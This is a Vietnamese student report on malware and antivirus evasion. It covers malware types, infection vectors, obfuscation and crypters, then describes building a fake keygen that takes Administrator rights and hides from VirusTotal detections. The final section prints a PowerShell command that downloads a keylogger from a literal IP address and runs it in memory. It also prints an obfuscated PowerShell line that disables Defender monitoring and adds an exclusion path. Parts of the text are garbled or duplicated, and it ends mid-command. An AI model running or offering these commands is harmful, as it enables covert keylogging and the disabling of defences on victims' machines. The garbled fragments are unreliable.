TỔNG QUAN VỀ MÃ ĐỘC
Mã độc là gì
Mã độc (malware) là phần mềm độc hại được thiết kế để phá hoại máy tính hoặc mạng máy tính, với nhiều chức năng như ăn cắp, mã hóa và chỉnh sửa dữ liệu mà không có sự cho phép của người dùng Ngày nay, mã độc ngày càng phức tạp, phát triển theo thời gian với các phương thức lây nhiễm và ẩn mình trong hệ thống, đồng thời có thể kết hợp nhiều chức năng của các loại mã độc khác nhau, gia tăng hiệu quả tấn công Sự gia tăng này đã thúc đẩy sự phát triển công nghệ bảo mật, tạo ra các giải pháp mới nhằm chống lại mã độc trong tương lai.
Mã độc chỉ gây thiệt hại sau khi vượt qua các giải pháp bảo mật và được cấy vào máy tính của nạn nhân, hoạt động như một phần mềm riêng biệt mà nạn nhân không hay biết Điều này khác với các lỗi phần mềm thông thường, do vô ý hoặc thiếu sót của lập trình viên, mặc dù những lỗi này cũng có thể bị kẻ xấu lợi dụng để chiếm quyền và điều khiển máy của nạn nhân.
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
Nhiều người dùng máy tính thường nhầm lẫn thuật ngữ "Virus" với tất cả các loại mã độc, nhưng thực tế, mã độc được phân thành nhiều loại khác nhau như Trojans, worms, spyware, botnet và ransomware.
Phân loại
Phân loại mã độc dựa trên các đặc tính như khả năng nhân bản, cách thức nhiễm, khả năng ẩn mình và C&C Sự lai tạp giữa các loại phần mềm độc hại khiến việc xác định loại mã độc ngày càng khó khăn Tuy nhiên, chúng vẫn được phân loại theo các nhóm chính.
Virus máy tính là loại mã độc phổ biến nhất và thường bị nhầm lẫn với các loại mã độc khác bởi những người không am hiểu công nghệ Chúng thường ẩn mình trong các chương trình máy tính vô hại hoặc các file có đuôi exe, dll Virus có khả năng tạo bản sao và lây lan sang các máy tính khác qua nhiều phương thức, chủ yếu là thông qua các thiết bị lưu trữ như USB và thẻ nhớ flash, cũng như qua email và các giao thức mạng chia sẻ dữ liệu.
Dựa vào các đặc tính của virus liên quan đến mục đích lây nhiễm và phương pháp ẩn thân, virus có thể được phân loại thành nhiều loại khác nhau.
Virus boot là loại virus xâm nhập vào sector đầu tiên của ổ cứng, cụ thể là boot sector hoặc master boot record Những khu vực này chứa thông tin quan trọng để khởi động hệ thống và nạp các phân vùng Việc tạo ra virus boot rất khó khăn do kích thước của nó phụ thuộc vào kích thước của một sector, thường là 512 byte, và cần sử dụng ngôn ngữ máy để lập trình Khả năng lây lan của virus này chậm và không còn phù hợp với sự phát triển nhanh chóng của mạng Internet hiện nay, khiến cho việc phát hiện loại virus này trở nên khó khăn.
Macro virus: o Là một loại virus được viết bằng ngôn ngữ macro, được nhúng vào phần mềm ứng dụng, các loại file phần mềm
Microsoft Excel và Microsoft Word cho phép nhúng macro, tức là mã độc hại vào các tài liệu có định dạng như doc, xls, ppt, gây ra các kịch bản có thể thực thi khi mở file Những đoạn mã này có thể thực hiện chuỗi hành động gây hại cho máy tính hoặc làm cầu nối để lây lan mã độc khác Do được nhúng vào tài liệu, chúng có khả năng hoạt động trên hầu hết các hệ điều hành, khiến cho mọi thiết bị đều có nguy cơ bị nhiễm virus.
Virus tập tin là một loại virus ẩn, tồn tại bên trong các file thực thi như exe và dll Khi người dùng mở file, mã virus sẽ được kích hoạt, dẫn đến các hành vi phá hoại và lây nhiễm.
Virus này rất nguy hiểm do khả năng lây lan nhanh chóng và khó phát hiện cũng như tiêu diệt hơn so với các loại virus khác Nó phụ thuộc vào các hệ điều hành khác nhau, vì mỗi hệ điều hành sử dụng các tập tin thực thi riêng biệt.
Scripting virus (virus kịch bản): Giống với virus macro Sự khác biệt cơ bản là virus macro được viết bằng ngôn ngữ được hiểu bởi một
Báo cáo đồ án nghiên cứu và phát triển thử nghiệm mã độc cho thấy rằng, các ứng dụng phần mềm cụ thể như trình xử lý văn bản Word có thể trở thành mục tiêu của virus Những virus này thường được viết bằng ngôn ngữ lập trình phù hợp với hệ điều hành đã cài đặt, khiến chúng không thể gỡ bỏ dễ dàng Do đó, loại virus này phụ thuộc vào từng hệ điều hành, với các đoạn mã độc khác nhau cho mỗi loại hệ điều hành.
Sâu máy tính (worm) là một loại mã độc tương tự như virus, hoạt động như một sinh vật ký sinh trong các chương trình máy tính với mục đích phá hoại và lây lan Khác với virus, sâu có khả năng tự nhân bản mà không cần phải sao chép hay nhúng vào tệp tin khác Chúng thường lây lan qua mạng máy tính, bao gồm cả Internet, và lợi dụng các lỗ hổng bảo mật trên hệ thống để phát tán với tốc độ nhanh chóng.
Worm lây lan nhanh hơn virus vì chúng sử dụng các máy nhiễm làm máy chủ để phát tán bản sao tới các máy tính khác trong mạng Cơ chế nhân bản của worm sử dụng đệ quy, dẫn đến tốc độ lây lan và tăng trưởng cấp số nhân trong hệ thống máy tính Do đó, khi phát hiện worm, cần nhanh chóng cách ly các máy đã bị nhiễm hoặc có khả năng bị nhiễm để bảo vệ các máy chưa có dấu hiệu bị nhiễm trong mạng.
Trojan horse, hay còn gọi tắt là Trojan, là một loại mã độc không giống như virus hay worm, vì nó không có khả năng tự nhân bản và lây lan Thay vào đó, Trojan cần thông qua các loại mã độc khác hoặc phần mềm trung gian để phát tán Các đoạn mã Trojan thường được giấu trong các phần mềm máy tính thông thường, nhằm xâm nhập vào máy tính của nạn nhân một cách bí mật Khi đã xâm nhập, chúng sẽ thực hiện các hành động ăn cắp thông tin mà nạn nhân không hề hay biết.
Ransomware là loại mã độc mã hóa dữ liệu hoặc ngăn cản quyền truy cập vào các tập tin trên máy tính Khi hệ thống bị nhiễm ransomware, kẻ tấn công sẽ yêu cầu một khoản tiền chuộc để khôi phục quyền truy cập cho người dùng.
Trang 4 phục lại dữ liệu (không phải lúc nào người dùng cũng có thể lấy lại được dữ liệu khi thanh toán theo yêu cầu của kẻ tấn công).
Back door, hay còn gọi là crypto backdoor, là một loại Trojan cho phép kẻ tấn công truy cập và thực hiện lệnh trên hệ thống bị xâm nhập Phương pháp này giúp kẻ tấn công vượt qua thủ tục xác thực người dùng bằng cách âm thầm mở cổng và tạo kết nối để truy nhập từ xa vào máy tính, đồng thời cố gắng tránh sự phát hiện từ các biện pháp giám sát thông thường.
Mã độc Rootkit cho phép kẻ tấn công truy cập đặc quyền vào hệ thống bị nhiễm, đồng thời che giấu sự hiện diện của nó và các phần mềm độc hại khác Sau khi chiếm quyền truy cập, kẻ tấn công sử dụng Rootkit để ẩn dữ liệu hệ thống, tập tin và tiến trình đang chạy, từ đó có thể xâm nhập vào hệ thống mà không bị phát hiện Rootkit có khả năng vượt qua hầu hết các phần mềm Antivirus, tạo ra một mối đe dọa nghiêm trọng cho an ninh mạng.
Adware là một loại phần mềm độc hại gây phiền toái cho người dùng bằng cách hiển thị quảng cáo trên màn hình của họ Nó thường được ngụy trang dưới dạng chương trình hợp pháp hoặc ẩn mình trong các phần mềm khác, nhằm lừa người dùng cài đặt Hình thức này tương tự như spam quảng cáo, làm giảm trải nghiệm sử dụng máy tính của nạn nhân.
Mục đích và tầm nguy hiểm của mã độc
Mã độc thường nhằm mục đích trộm cắp thông tin cá nhân hoặc tạo cửa sau trong hệ thống để truy cập dữ liệu mà không cần sự cho phép của chủ sở hữu Theo thống kê, phần lớn các cuộc tấn công bằng mã độc tập trung vào chính phủ và các tổ chức tài chính, tiếp theo là các công ty và dịch vụ khác Điều này cho thấy mục tiêu chính của mã độc là lợi nhuận và khả năng lây lan rộng rãi.
Hình 3 Mục đích của tấn công mã độc
Mã độc là mối đe dọa nghiêm trọng đối với máy chủ của cá nhân và tổ chức, gây ra sự phá hủy và gián đoạn lớn, cùng với chi phí phục hồi cao Tất cả người dùng máy tính, laptop, thiết bị di động và IoT đều có nguy cơ bị tấn công Mã độc có khả năng chiếm quyền điều khiển thiết bị, đánh cắp dữ liệu nhạy cảm, ảnh hưởng đến băng thông và làm tổn hại đến tính bảo mật, toàn vẹn và sẵn sàng của dữ liệu Đặc biệt, thiết bị IoT nhiễm mã độc có thể dẫn đến việc người dùng bị theo dõi các hoạt động cá nhân hàng ngày.
Quy ước đặt tên cho mã độc
Hiện nay, các hãng phần mềm Antivirus đã thu thập nhiều biến thể mã độc khác nhau, dẫn đến nhu cầu thống nhất tên gọi của chúng theo quy tắc cụ thể Tổ chức nghiên cứu virus máy tính CARO đã đề xuất một định dạng chung cho tất cả các loại mã độc.
Hình 4 Quy ước đặt tên cho mã độc
Trong đó : o Type: chỉ ra loại của mã độc thực thi trên máy tính của bạn.
Worms, viruses, trojans, backdoors, và ransomware là một số loại mã độc phổ biến hiện nay. o Platform: các nền tảng chỉ ra môi trường thực thi của mã độc
Phần mềm độc hại được thiết kế để hoạt động trên các nền tảng như Windows, macOS X và Android, và có thể được phân loại theo ngôn ngữ lập trình hoặc định dạng của nó Nhóm phần mềm độc hại, hay còn gọi là Framily, được xác định dựa trên các đặc điểm chung và tác giả giống nhau, trong khi các nhà cung cấp phần mềm bảo mật thường sử dụng các tên khác nhau cho cùng một họ phần mềm độc hại Biến thể, hay Variant, đại diện cho các phiên bản riêng biệt trong một loại mã độc, thể hiện sự đa dạng trong từng phiên bản.
Ví dụ: phát hiện biến thể “.AF” sẽ được tạo sau khi phát hiện biến thể
“.AE” o Suffixes: Cung cấp thêm chi tiết về phần mềm độc hại, bao gồm cách nó được sử dụng như một phần của mối đe dọa đa thành phần.
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
Trong ví dụ trên, "! Lnk" chỉ ra rằng thành phần mối đe dọa là một tệp lối tắt được sử dụng bởi Trojan: Win32/Reveton.T.
CƠ CHẾ HOẠT ĐỘNG CỦA MÃ ĐỘC
Cơ chế hoạt động của mã độc
Nghiên cứu mã độc trên máy tính liên quan đến việc phân tích các định dạng dữ liệu và vật chủ, vì mỗi loại mã độc chỉ lây nhiễm vào một số định dạng nhất định Việc phân tích các định dạng dữ liệu mà mã độc thường sử dụng để phát tán và thực thi cho thấy rằng các định dạng vật chủ chứa mã thực thi có khả năng nhiễm mã độc bao gồm các tệp tin văn bản và tệp tin chương trình.
STT Vật chủ Loại virus Định dạng Kiểu
Tệp tin siêu văn bản htt, hta
Tệp tin thực thi exe, scr
Tệp tin thư viện dll, cpl, sys
Tệp tin tư liệu doc, docx, dot
Tệp tin bảng tính xls, xlsx, xlt
Tệp trình trình diễn ppt, pptx, pot
4 Mẫu tin khởi động Boot virus
Mẫu tin khởi động hệ điều hành đĩa mềm #N/A
Mẫu tin khởi động hệ điều hành đĩa cứng #N/A
Mẫu tin khởi tạo phân vùng đĩa cứng #N/A
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
2.2 Các phương pháp lây lan của mã độc
Hiện nay, mã độc hại có thể được phát tán qua nhiều hình thức khác nhau, bao gồm tệp đính kèm trong email, phần mềm chứa mã độc, việc chia sẻ USB, và các lỗ hổng trong hệ điều hành hoặc ứng dụng.
2.2.1 Phát tán thông qua tệp đính kèm trong email
Hiện nay, phương thức phát tán mã độc qua email phổ biến nhất là các hacker gửi kèm tài liệu độc hại, bao gồm virus lừa đảo, spyware và worm Những tài liệu này thường có định dạng file không rõ nguồn gốc, đặc biệt là các file có đuôi exe, com, pdf, bat và zip.
Hình 5 Đính kèm mã độc trong email
Dưới đây là kịch bản sử dụng tài liệu độc hại để phát tán và lây nhiễm gây hại cho người dùng.
Hình 6 Quy trình lây nhiễm mã độc qua email
Tin tặc gửi email chứa file đính kèm là file Excel để lừa đảo người dùng Khi người dùng mở email và kiểm tra file đính kèm, mã độc sẽ được kích hoạt và chạy, gây nguy hiểm cho hệ thống của họ.
Trang 10 ẩn Mã độc ở đây là một chương trình keylogger Chương trình này sẽ ghi lại toàn bộ thông tin hoạt động của nạn nhân Sau đó gửi thông tin nhạy cảm này về cho máy chủ của tin tặc.
2.2.2 Phát tán dựa trên link độc hại
Hình thức phát tán mã độc qua link độc hại là một phương thức tấn công phổ biến Các tội phạm mạng thường sử dụng kỹ thuật này để lừa đảo người dùng, dẫn họ đến các trang web chứa mã độc Người dùng cần cảnh giác và kiểm tra kỹ lưỡng các liên kết trước khi nhấp vào để bảo vệ thiết bị của mình khỏi các mối đe dọa tiềm ẩn.
Hình 7 Phát tán mã độc bằng link độc hại thông qua sms brandname
Theo thông tin từ Trung tâm Giám sát an toàn không gian mạng quốc gia (NCSC), tính đến năm 2020, Việt Nam đã ghi nhận 24,820 website không an toàn, trong đó có 12,052 website bị cảnh báo về nguy cơ lừa đảo và giả mạo Người dùng dễ dàng bị lừa khi truy cập vào các trang web giả mạo có giao diện giống hệt các thương hiệu nổi tiếng, như ngân hàng hay chính phủ Những trang web này không chỉ nhằm mục đích lừa đảo, chiếm đoạt tài sản mà còn chứa các đoạn mã độc được viết bằng ngôn ngữ kịch bản JavaScript, được mã hóa để người dùng không nhận ra Hệ quả là, người dùng có thể bị tự động điều hướng đến các liên kết khác để tải xuống và thực thi mã độc trên máy tính của họ.
Khi người dùng truy cập vào website chứa mã độc viết bằng JavaScript, họ có thể không nhận ra sự nguy hiểm do mã đã bị làm mờ hoặc mã hóa Người dùng sẽ bị tự động điều hướng đến một liên kết khác để tải mã độc vào máy tính và thực thi Từ đó, các mã độc này có thể gây ra những thiệt hại tùy thuộc vào khả năng của chúng.
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
2.2.3 Phát tán thông qua thiết bị USB Đây được xem là một trong những hình thức phát tán mã độc rất phổ biến Trước đây, tính năng AutoRun được các kẻ tấn công lạm dụng thực thi mã độc với cơ chế mở ổ đĩa là kích hoạt mã độc Điều này khiến tốc độ lây lan của dòng mã độc này trở nên không thể kiểm soát Do đó đã buộc Microsoft quyết định cắt bỏ tính năng AutoRun đối với USB từ windows 7 và trên cả Windows XP.
Hình 8 Phát tán mã độc thông qua các thiết bị USB
Hiện nay, tin tặc đã phát triển một phương thức mới để lây nhiễm mã độc qua USB Khi người dùng mở USB bị nhiễm, họ sẽ thấy một ổ đĩa giả mạo bên trong, và phải mở ổ đĩa này để truy cập dữ liệu Thực tế, ổ đĩa thứ hai này là một shortcut chứa mã độc, và khi người dùng mở nó, máy tính sẽ bị nhiễm virus Mặc dù cơ chế AutoRun đã bị loại bỏ, nhưng với sự xuất hiện của W32.UsbFakeDriver, virus trên USB vẫn có thể lây lan nhanh chóng chỉ bằng cách truy cập vào ổ đĩa USB.
Các phương phát lây lan của mã độc
Trước khi tìm hiểu các kỹ thuật để vượt qua phần mềm Antivirus, chúng ta cần hiểu cách mà các phần mềm này phát hiện chương trình độc hại Hiểu rõ quy trình phát hiện của Antivirus sẽ giúp chúng ta rút ra những phương pháp hiệu quả để tránh bị phát hiện, đồng thời cũng là cách mà tin tặc đã sử dụng để qua mặt hệ thống bảo mật của bạn.
3.1 Phần mềm Antivirus hoạt động như thế nào? Để chống lại virus nói chung là một công việc vô cùng khó khăn; bởi vì nó cần phải tìm và xác định được đâu là tệp độc hại trong một khoảng thời gian cực ngắn để không làm gián đoạn đến trải nghiệm của người dùng Điều quan trọng là phải hiểu rõ các kỹ thuật mà Hacker dùng để bypass lại hệ thống Antivirus để thiết kế bảo mật toàn diện bảo vệ được hệ thống của cá nhân tổ chức.
Hình 9 Một số phần mềm Antivirus thông dụng hiện nay
Hai phương pháp phổ biến mà các hệ thống, phần mềm Antivirus sử dụng để tìm kiếm và xác định các tệp độc hại là quét theo phương pháp
Quét dựa trên bộ signature kiểm tra hình thức, cấu trúc và định dạng của tệp để tìm các chuỗi và hàm tương ứng với phần mềm độc hại đã biết Trong khi đó, tính năng quét dựa trên heuristic phân tích chức năng của tệp thông qua các thuật toán và mẫu nhằm xác định liệu phần mềm có thực hiện hành động đáng ngờ nào hay không.
Phần mềm Antivirus từ lâu đã được xem là giải pháp hiệu quả để bảo vệ hệ thống Tuy nhiên, nhiều chuyên gia công nghệ thông tin và an ninh mạng cảnh báo rằng mặc dù Antivirus là công cụ hữu ích, nó không thể đảm bảo hệ thống của bạn hoàn toàn an toàn trước các cuộc tấn công Điều này bởi vì các chương trình Antivirus chủ yếu dựa vào cơ sở dữ liệu nhận diện mối đe dọa, dẫn đến khả năng bị vượt qua.
MỘT SỐ KỸ THUẬT VƯỢT MẶT ANTIVIRUS
Phần mềm Antivirus hoạt động như thế nào?
Chống lại virus là một thách thức lớn, đòi hỏi khả năng phát hiện nhanh chóng các tệp độc hại để không làm gián đoạn trải nghiệm người dùng Hiểu rõ các kỹ thuật mà hacker sử dụng để vượt qua hệ thống Antivirus là điều cần thiết để thiết kế một giải pháp bảo mật toàn diện, bảo vệ an toàn cho hệ thống của cá nhân và tổ chức.
Hình 9 Một số phần mềm Antivirus thông dụng hiện nay
Hai phương pháp phổ biến mà các hệ thống, phần mềm Antivirus sử dụng để tìm kiếm và xác định các tệp độc hại là quét theo phương pháp
Quét dựa trên bộ signature kiểm tra hình thức, cấu trúc và định dạng của tệp, tìm kiếm các chuỗi và hàm tương ứng với phần mềm độc hại đã biết Trong khi đó, tính năng quét heuristic phân tích chức năng của tệp bằng cách sử dụng các thuật toán và mẫu để xác định liệu phần mềm có hành vi đáng ngờ hay không.
Phần mềm Antivirus từ lâu đã được xem là giải pháp hiệu quả để bảo vệ hệ thống, nhưng nhiều chuyên gia công nghệ thông tin và an ninh mạng cảnh báo rằng việc sử dụng chúng không đảm bảo hệ thống hoàn toàn miễn nhiễm trước các cuộc tấn công Điều này bởi vì các chương trình Antivirus chủ yếu dựa vào cơ sở dữ liệu về các dấu hiệu nhận biết, do đó có thể không phát hiện được những mối đe dọa mới hoặc tinh vi hơn.
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
Tin tặc đã vượt mặc Antivirus như thế nào?
Tội phạm mạng đã phát triển nhiều kỹ thuật để né tránh phần mềm Antivirus, đảm bảo phần mềm độc hại của chúng không bị phát hiện Một trong những phương pháp này là đóng gói và mã hóa mã nguồn, cho phép chúng thiết kế các tiện ích đặc biệt nhằm tránh sự phát hiện của phần mềm Antivirus Ngoài ra, tội phạm mạng còn thực hiện đột biến mã bằng cách trộn mã virus trojan với 'thư rác', từ đó thay đổi giao diện mã của phần mềm để tăng cường khả năng ẩn náu.
Tội phạm mạng có khả năng vượt qua phần mềm Antivirus bằng cách ngăn chặn hoạt động của chúng và cập nhật cơ sở dữ liệu Các loại virus như trojan và sâu mạng sẽ tìm kiếm và tấn công các chương trình Antivirus đang hoạt động trên hệ thống của nạn nhân, từ đó làm hỏng cơ sở dữ liệu hoặc ngăn chặn phần mềm Antivirus hoạt động hiệu quả.
Tin tặc tiếp tục sử dụng hình thức tấn công phishing, trong đó họ tạo ra email giả mạo trông hợp pháp liên quan đến doanh nghiệp của bạn Khi người dùng nhấp vào các tệp đính kèm, những chương trình độc hại sẽ tự động tải xuống từ các tệp tưởng chừng an toàn như Adobe PDF hoặc sản phẩm của Microsoft Office.
Kỹ thuật Obfuscation
Obfuscation là kỹ thuật làm cho chương trình trở nên khó hiểu hơn, nhằm chuyển đổi chương trình sang phiên bản mới mà không thay đổi chức năng Ban đầu, công nghệ này được phát triển để bảo vệ tài sản trí tuệ của các nhà phát triển phần mềm Tuy nhiên, nó đã bị các tác giả phần mềm độc hại lợi dụng để tránh bị phát hiện, cho phép các phần mềm độc hại phát triển thành các thế hệ mới thông qua kỹ thuật obfuscation nhằm trốn tránh các phần mềm diệt virus.
Obfuscation là quá trình biến dạng phần mềm độc hại nhưng vẫn giữ nguyên chức năng của nó Ví dụ, việc ngẫu nhiên hóa các ký tự trong tập lệnh PowerShell có thể làm cho mã trở nên khó nhận diện hơn Mặc dù PowerShell không phân biệt chữ hoa và chữ thường, nhưng điều này có thể khiến các công cụ quét dựa trên chữ ký đơn giản bị nhầm lẫn.
Mã máy tính có thể được hiểu bởi người dùng, thiết bị tính toán hoặc chương trình khác Obfuscation được sử dụng để đánh lừa các công cụ Antivirus và các chương trình dựa vào chữ ký số để phân tích mã Các trình biên dịch hỗ trợ nhiều ngôn ngữ như Java, hệ điều hành như Android và iOS, cũng như các nền tảng phát triển như NET Mục tiêu của obfuscation là làm khó khăn cho việc đảo ngược mã nguồn từ các chương trình này.
Obfuscation không thay đổi nội dung mã gốc của chương trình, mà chỉ làm cho phương thức phân phối và cách trình bày của mã trở nên khó hiểu hơn Quá trình này không ảnh hưởng đến cách hoạt động hay kết quả đầu ra của chương trình.
Dưới đây là một ví dụ về mã JavaScript cơ bản: `var greeting = 'Hello World'; greeting = 10; var product = greeting * greeting;` Mã này thể hiện cách thay đổi giá trị biến và thực hiện phép toán.
_0x154f=['98303fgKsLC','9koptJz','1LFqeWV','13XCjYtB','6990QlzuJn','8 7260lXoUxl','2HvrLBZ','15619aDPIAh','1kfyliT','80232AOCrXj','2jZAgw Y','182593oBiMFy','1lNvUId','131791JfrpUY'];var
{try{var _0x2d3a87=- parseInt(_0x5e377c(0x129))*parseInt(_0x5e377c(0x123))+- parseInt(_0x5e377c(0x125))*parseInt(_0x5e377c(0x12e))
+parseInt(_0x5e377c(0x127))*-parseInt(_0x5e377c(0x126))+- parseInt(_0x5e377c(0x124))*-parseInt(_0x5e377c(0x12f))+- parseInt(_0x5e377c(0x128))*-parseInt(_0x5e377c(0x12b))
(_0x154f,0x1918c));var greeting='Hello\x20World';greeting=0xa;var product=greeting*greeting;
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
Dưới đây là một số kỹ thuật Obfuscation phổ biến
Trình obfuscator thực hiện việc đổi tên các phương thức và biến, tạo ra những tên mới có thể chứa ký tự không in được hoặc không nhìn thấy.
Packing: iều này sẽ nén toàn bộ chương trình để làm cho mã không thể đọc được.
Kiểm soát dòng chảy trong lập trình là rất quan trọng, vì mã dịch ngược thường có dạng logic spaghetti, gây khó khăn trong việc duy trì và hiểu rõ Khi dòng suy nghĩ bị che khuất, kết quả từ mã trở nên không rõ ràng, làm cho việc xác định mục đích của mã trở nên khó khăn chỉ bằng cách nhìn vào nó.
Cách tiếp cận biến đổi mẫu lệnh này sử dụng các hướng dẫn phổ biến được tạo ra bởi trình biên dịch và thay thế chúng bằng những hướng dẫn phức tạp hơn, ít phổ biến hơn, nhằm thực hiện hiệu quả các tác vụ tương tự.
Mã giả có thể được chèn vào chương trình nhằm làm tăng độ khó trong việc đọc và phân tích ngược, tuy nhiên, điều này không làm ảnh hưởng đến logic hay kết quả cuối cùng của chương trình.
Việc loại bỏ siêu dữ liệu và mã không sử dụng là cần thiết để cải thiện chất lượng chương trình Mặc dù siêu dữ liệu có thể cung cấp thông tin bổ sung cho người đọc, giống như chú thích trong tài liệu Word, nhưng việc xóa chúng giúp giảm thiểu sự rối rắm và tối ưu hóa mã Tuy nhiên, điều này cũng có thể làm giảm thông tin mà người đọc có thể sử dụng để hiểu và gỡ lỗi chương trình.
Chèn vị ngữ đục là một kỹ thuật trong lập trình, trong đó vị từ được sử dụng là các biểu thức logic có thể đúng hoặc sai Các vị từ này thường xuất hiện trong các câu lệnh điều kiện như if-then, nơi mà kết quả không thể xác định một cách dễ dàng thông qua phân tích thống kê Việc sử dụng vị từ không rõ ràng có thể dẫn đến việc thêm mã không cần thiết, mã này không bao giờ được thực thi nhưng lại làm cho người đọc khó hiểu về kết quả được dịch ngược.
Chống gỡ lỗi là một kỹ thuật quan trọng được sử dụng bởi các kỹ sư phần mềm và tin tặc hợp pháp để đảm bảo tính bảo mật của mã nguồn Các công cụ gỡ lỗi cho phép họ kiểm tra và phân tích từng dòng mã, giúp phát hiện và khắc phục các lỗ hổng bảo mật Việc áp dụng các biện pháp chống gỡ lỗi có thể ngăn chặn các hành vi xâm nhập trái phép, bảo vệ ứng dụng và dữ liệu quan trọng khỏi các mối đe dọa từ bên ngoài.
Trang 16 công cụ này, các kỹ sư phần mềm có thể phát hiện ra các vấn đề với mã và tin tặc có thể sử dụng chúng để thiết kế ngược mã Các chuyên gia bảo mật CNTT có thể sử dụng các công cụ chống gỡ lỗi để xác định khi nào một tin tặc đang chạy chương trình gỡ lỗi như một phần của cuộc tấn công Tin tặc có thể chạy các công cụ chống gỡ lỗi để xác định khi nào một công cụ gỡ lỗi đang được sử dụng để xác định những thay đổi mà chúng đang thực hiện đối với mã.
Anti-tamper: Chống làm giả Các công cụ này phát hiện mã đã bị giả mạo và nếu nó đã được sửa đổi, nó sẽ dừng chương trình.
Mã hóa chuỗi là một phương pháp bảo mật sử dụng mã hóa để ẩn các chuỗi trong tệp thực thi, chỉ khôi phục giá trị khi cần thiết cho quá trình chạy chương trình Kỹ thuật này làm cho việc tìm kiếm các chuỗi cụ thể trong chương trình trở nên khó khăn hơn.
Code transposition: Đây là sự sắp xếp lại các quy trình và các nhánh trong mã mà không có ảnh hưởng rõ ràng đến hành vi của nó.
Kỹ thuật Encryption
Phương pháp thứ hai là mã hóa (Encryption), một kỹ thuật hiệu quả giúp loại bỏ khả năng phát hiện phần mềm độc hại bởi các phần mềm Antivirus thông qua chữ ký (Signature) Kẻ tấn công thường sử dụng các Crypter, tức là chương trình mã hóa, để mã hóa tải trọng độc hại của họ Các Crypter này sẽ mã hóa một tệp tin và đính kèm một 'Stub', sau đó sử dụng một chương trình Decrypter để giải mã nội dung và thực thi chúng.
Một trong những phương pháp để đối phó với các phần mềm độc hại dựa trên chữ ký là sử dụng mã hóa Phương pháp này thường bao gồm việc mã hóa phần mềm độc hại, trong đó có bộ giải mã và phần tải trọng được mã hóa Bộ giải mã sẽ phục hồi phần tải trọng mỗi khi file bị nhiễm được thực thi, và với mỗi lần lây nhiễm, phần mềm độc hại sử dụng một khóa khác nhau, làm cho phần được mã hóa trở nên độc nhất và ẩn đi chữ ký của nó Tuy nhiên, nhược điểm chính của phương pháp này là bộ giải mã không thay đổi giữa các thế hệ, điều này cho phép phần mềm diệt virus phát hiện được loại phần mềm độc hại này dựa trên mẫu bộ giải mã có sẵn.
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC decryptCodeSection(); // Decrypt the code startShellCode(); // Call the shellcode in decrypted code return 0;
Có 2 loại chương trình Crypter:
Scantime: là những chương trình đơn giản nhất và đơn giản là giải mã payload, sau đó đưa nó xuống ổ đĩa để thực thi.
Runtime là một chương trình sử dụng các kỹ thuật để tiêm các quy trình khác nhau nhằm giải mã payload độc hại và thực thi nó trực tiếp trên bộ nhớ RAM mà không cần can thiệp vào đĩa cứng.
Một trong những phương pháp Injection process phổ biến nhất là "Process Hollowing" Phương pháp này bắt đầu bằng việc tạo một tiến trình mới ở trạng thái treo, sử dụng tệp thực thi hợp pháp như explorer.exe Sau đó, nó giải phóng bộ nhớ của tiến trình hợp pháp và thay thế bằng payload độc hại, trước khi tiếp tục tiến trình.
TRIỂN KHAI THỰC NGHIỆM MÃ ĐỘC
Triển khai kỹ thuật vượt mặc Antivirus
Ý tưởng ban đầu để lừa người dùng thực thi mã độc là ẩn nó trong một chương trình, được gọi là keygen Giao diện chính của chương trình sẽ được thiết kế hấp dẫn để thu hút người dùng.
Hình 10 Giao diện chính của phần mềm chứa mã độc
Phần mềm này chủ yếu có chức năng chiếm quyền Administrator từ người dùng và thực thi mã độc đi kèm Trước khi thực hiện kỹ thuật vượt qua Antivirus, nhóm sẽ kiểm tra xem phần mềm có bị phát hiện bởi bất kỳ phần mềm Antivirus nào hay không Để thực hiện kiểm tra này, nhóm sử dụng trang web https://www.virustotal.com/gui/, một công cụ kiểm tra trực tuyến miễn phí với sự tham gia của nhiều phần mềm Antivirus khác nhau.
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
Hình 11 Kết quả Virus Total kiểm tra trước khi có mã độc được đính kèm
Mặc dù phần mềm chưa chứa mã độc, nhưng Virustotal cho thấy 15/68 phần mềm Antivirus nhận diện nó là chương trình độc hại Điều này không có nghĩa là Antivirus phát hiện nhầm, vì phần mềm vẫn chưa có mã độc Các phần mềm Antivirus hoạt động theo cơ chế Heuristic sẽ không phát hiện ra mối nguy hiểm này Tuy nhiên, cơ chế Signature sẽ tìm kiếm chuỗi dữ liệu và thông tin liên quan đến metadata trong chương trình.
Hình 12 Thông tin metadata của phần mềm chứa mã độc
Dựa vào thông tin metadata, có thể nhận định rằng đây có thể là một phần mềm độc hại Các phần mềm Antivirus hoạt động dựa trên cơ chế Signature để xác định mối đe dọa Để xác minh kết quả từ các phần mềm Antivirus trên trang Virustotal, nhóm sẽ thay đổi thông tin metadata và kiểm tra lại.
Hình 13 Thông tin metadata của phần mềm độc hại sau khi được chỉnh sửa
Hình 14 Kết quả Virustotal kiểm tra sau khi thay đổi thôn gtin metadata
Nhằm gây khó khăn cho việc phân tích mã độc, nhóm phát triển quyết định không lưu mã độc chính trong chương trình Thay vào đó, mã độc sẽ được đính kèm trong phần mềm, có nhiệm vụ tải xuống phần mềm độc hại.
Keylogger.exe được lưu trên server, và đoạn mã độc chính cũng sẽ được tải về và thực thi ngay trên memory. iex((New-Object
System.Net.WebClient).DownloaString(\"http://103.69.193.23/Document.doc"))
Hình 15 Mã độc đính kèm trong phần mềm
("{4}{3}{1}{2}{0}"-f'Preference','t-M','p','e','S')-DisableRealtimeMonitoring $ {T`RuE}&("{1}{0}{2}{3}"-f't-Mp','Se','Prefer','ence')-ExclusionPath
("$env:APPDATA\Active"+'W'+'indow'+'s')(&("{0}{1}{2}"-f'New-O','bje','ct')
